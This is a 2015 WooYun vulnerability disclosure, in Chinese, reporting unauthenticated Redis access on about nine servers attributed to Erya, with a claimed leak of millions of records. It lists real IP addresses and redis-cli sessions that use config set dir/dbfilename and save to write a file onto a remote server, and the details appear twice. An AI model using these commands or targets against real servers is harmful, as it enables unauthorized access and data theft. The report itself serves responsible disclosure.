当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
尔雅近10个服务器redis未授权访问,泄漏几百万数据信息
相关厂商:
漏洞作者:
提交时间:
2015-05-06 16:48
修复时间:
2015-06-20 20:58
公开时间:
2015-06-20 20:58
漏洞类型:
网络未授权访问
危害等级:
自评Rank:
20
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2015-05-06: 细节已通知厂商并且等待厂商处理中
2015-05-06: 厂商已经确认,细节仅向厂商公开
2015-05-16: 细节向核心白帽子及相关领域专家公开
2015-05-26: 细节向普通白帽子公开
2015-06-05: 细节向实习白帽子公开
2015-06-20: 细节向公众公开

简要描述:

详细说明:

QQ图片20150426144335.png


先来看第一个。问过工作人员,应该是尔雅旗下的服务器
ip:122.112.16.13存在redis未授权访问。因为没有网站所以没getshell

C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.13
redis 122.112.16.13:6379> config set dir /var
OK
redis 122.112.16.13:6379> config set dbfilename test.txt
OK
redis 122.112.16.13:6379> set fuck wooyun
OK
redis 122.112.16.13:6379> save
OK
(10.91s)
redis 122.112.16.13:6379>


可以看到正常执行命令并导出了文件。。
同样,对尔雅所在服务器网段进行扫描,发现近10台存在同样的问题。。
这里一起打包提交

122.112.16.13
122.112.16.14
122.112.16.144
122.112.16.239
218.246.22.189
118.26.230.55
118.26.230.198
118.26.230.241
118.26.230.254


全部存在未授权访问

C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.14
redis 122.112.16.14:6379>
redis 122.112.16.14:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.144
redis 122.112.16.144:6379>
redis 122.112.16.144:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.239
redis 122.112.16.239:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 218.246.22.189
redis 218.246.22.189:6379>
redis 218.246.22.189:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.55
redis 118.26.230.55:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.198
redis 118.26.230.198:6379>
redis 118.26.230.198:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.241
redis 118.26.230.241:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.254
redis 118.26.230.254:6379>


全部连接成功
其中118.26.230.198泄漏数据超过387w

1.png

漏洞证明:

QQ图片20150426144335.png


先来看第一个。问过工作人员,应该是尔雅旗下的服务器
ip:122.112.16.13存在redis未授权访问。因为没有网站所以没getshell

C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.13
redis 122.112.16.13:6379> config set dir /var
OK
redis 122.112.16.13:6379> config set dbfilename test.txt
OK
redis 122.112.16.13:6379> set fuck wooyun
OK
redis 122.112.16.13:6379> save
OK
(10.91s)
redis 122.112.16.13:6379>


可以看到正常执行命令并导出了文件。。
同样,对尔雅所在服务器网段进行扫描,发现近10台存在同样的问题。。
这里一起打包提交

122.112.16.13
122.112.16.14
122.112.16.144
122.112.16.239
218.246.22.189
118.26.230.55
118.26.230.198
118.26.230.241
118.26.230.254


全部存在未授权访问

C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.14
redis 122.112.16.14:6379>
redis 122.112.16.14:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.144
redis 122.112.16.144:6379>
redis 122.112.16.144:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 122.112.16.239
redis 122.112.16.239:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 218.246.22.189
redis 218.246.22.189:6379>
redis 218.246.22.189:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.55
redis 118.26.230.55:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.198
redis 118.26.230.198:6379>
redis 118.26.230.198:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.241
redis 118.26.230.241:6379> quit
C:\Users\1\Desktop\redis_win\redis\redisbin_x64>redis-cli -h 118.26.230.254
redis 118.26.230.254:6379>


全部连接成功
其中118.26.230.198泄漏数据超过387w

1.png

修复方案:

版权声明:转载请注明来源 好基友一辈子@乌云


>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-06 20:57

厂商回复:

感谢提出,问题确实存在,正在修复中

最新状态:

暂无